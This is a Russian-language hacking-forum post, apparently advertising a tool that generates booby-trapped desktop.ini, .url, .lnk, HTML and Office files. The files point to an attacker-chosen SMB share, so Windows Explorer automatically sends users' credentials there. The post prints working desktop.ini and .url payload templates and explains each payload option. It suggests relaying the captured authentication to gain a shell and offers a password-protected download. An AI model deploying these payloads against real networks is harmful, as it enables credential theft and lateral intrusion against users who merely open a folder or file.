Взлом - это не всегда взлом систем с уязвимостями удаленного выполнения. На этот раз мы собираемся использовать другой подход.
Представьте, что вы подключены к доменной сети и каким-то образом можете доставлять файлы в сеть, например, записывать файлы на активно используемый файловый сервер, отправлять документы по электронной почте пользователям сети или выполнять MITM-атаки против HTTP-трафика. Если вы можете это сделать, то вам нужен только способ заставить сетевые компьютеры подключаться к хосту по вашему выбору.
Генерация полезной нагрузки нашей сети предоставляет новые способы, которые вы можете использовать для атаки на эти сети, поскольку он может развертывать несколько видов контента, который заставит удаленные компьютеры подключаться к назначенной цели и аутентифицировать себя от имени вошедшего в систему пользователя. На данный момент существует множество способов использовать эти системы, такие как сниффинг, выполнение
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
или новый
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
.
Наш инструмент генерации полезной нагрузки может генерировать и развертывать несколько файлов, таких как desktop.ini, файлы lnk, файлы URL, документы html/office со встроенными ссылками на удаленный ресурс. Эти встроенные ссылки автоматически обрабатываются проводником Microsoft, и отключить его невозможно.
Подробности:
Параметр -t указывает, какая полезная нагрузка будет использоваться. Примеры:
* d1: Iconfile - desktop.ini: Параметр IconFile указывает на сетевой ресурс. Когда вы получаете доступ к папке файловой системы и этот файл desktop.ini хранится в подпапке, explorer.exe автоматически подключается к сети и отправляет учетные данные пользователя. * d2 :
LocalizedResourceName - desktop.ini: LocalizedResourceName указывает на сетевой ресурс. Работает с папкой/подпапкой * d3: Информационная подсказка - desktop.ini: Информационная подсказка указывает на сетевой ресурс. Работает при выборе папки * d4: desktop.ini - desktop.ini : Desktop.ini указывает на сетевой ресурс. Работает при входе в папку
* d0: Все - desktop.ini: Разверните все известные полезные нагрузки desktop.ini одновременно, чтобы убедиться, что удаленная цель задействована.
[.ShellClassInfo]
Информационная подсказка=Проверка концепции перенаправления рабочего стола -
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
desktop.ini=@\\host\admin$,-1
Информационная подсказка=@\\host\admin$,-1
LocalizedResourceName=@\\host\admin$,-1
IconFile=\\host\admin$
IconIndex=-666
ConfirmFileOp=0
* u: url-файл: разверните .url-файл, который работает в виде lnk-файла. Целевой IconFile= указывает на сетевую службу.
[ПО УМОЛЧАНИЮ]
BASEURL=
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
[InternetShortcut]
URL=
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Modified=203BF2701D7FC60120
IconIndex=3
IconFile=\\host\admin$
* l: URL-адрес: разверните файл .lnk. Это пустой встроенный файл lnk, который содержит параметр CUSTOMICON (флаг и 128), указывающий на сетевую службу.
* h: html-файл: разверните .html-файл со LINK REL="stylesheet" , указывающим на сетевую службу.
* o: офисный файл: разверните файл .pps с HTML-кодом LINK REL="stylesheet" , указывающим на сетевую службу. Вы можете переименовать расширение файла в .doc,.ppt,.pps,.xls,..
Параметр -p является необязательным и указывает на каталог, в котором будут сохранены полезные данные.
Вы можете использовать этот инструмент для развертывания полезной нагрузки и атаки на сетевой канал, созданный инструментом
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
. или воспроизведите SMB или HTTP-трафик на указанную цель, чтобы получить оболочку с помощью
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
.Вы можете просматривать в Интернете
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
.
Скачать :
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Пароль: 1111
Последнее редактирование: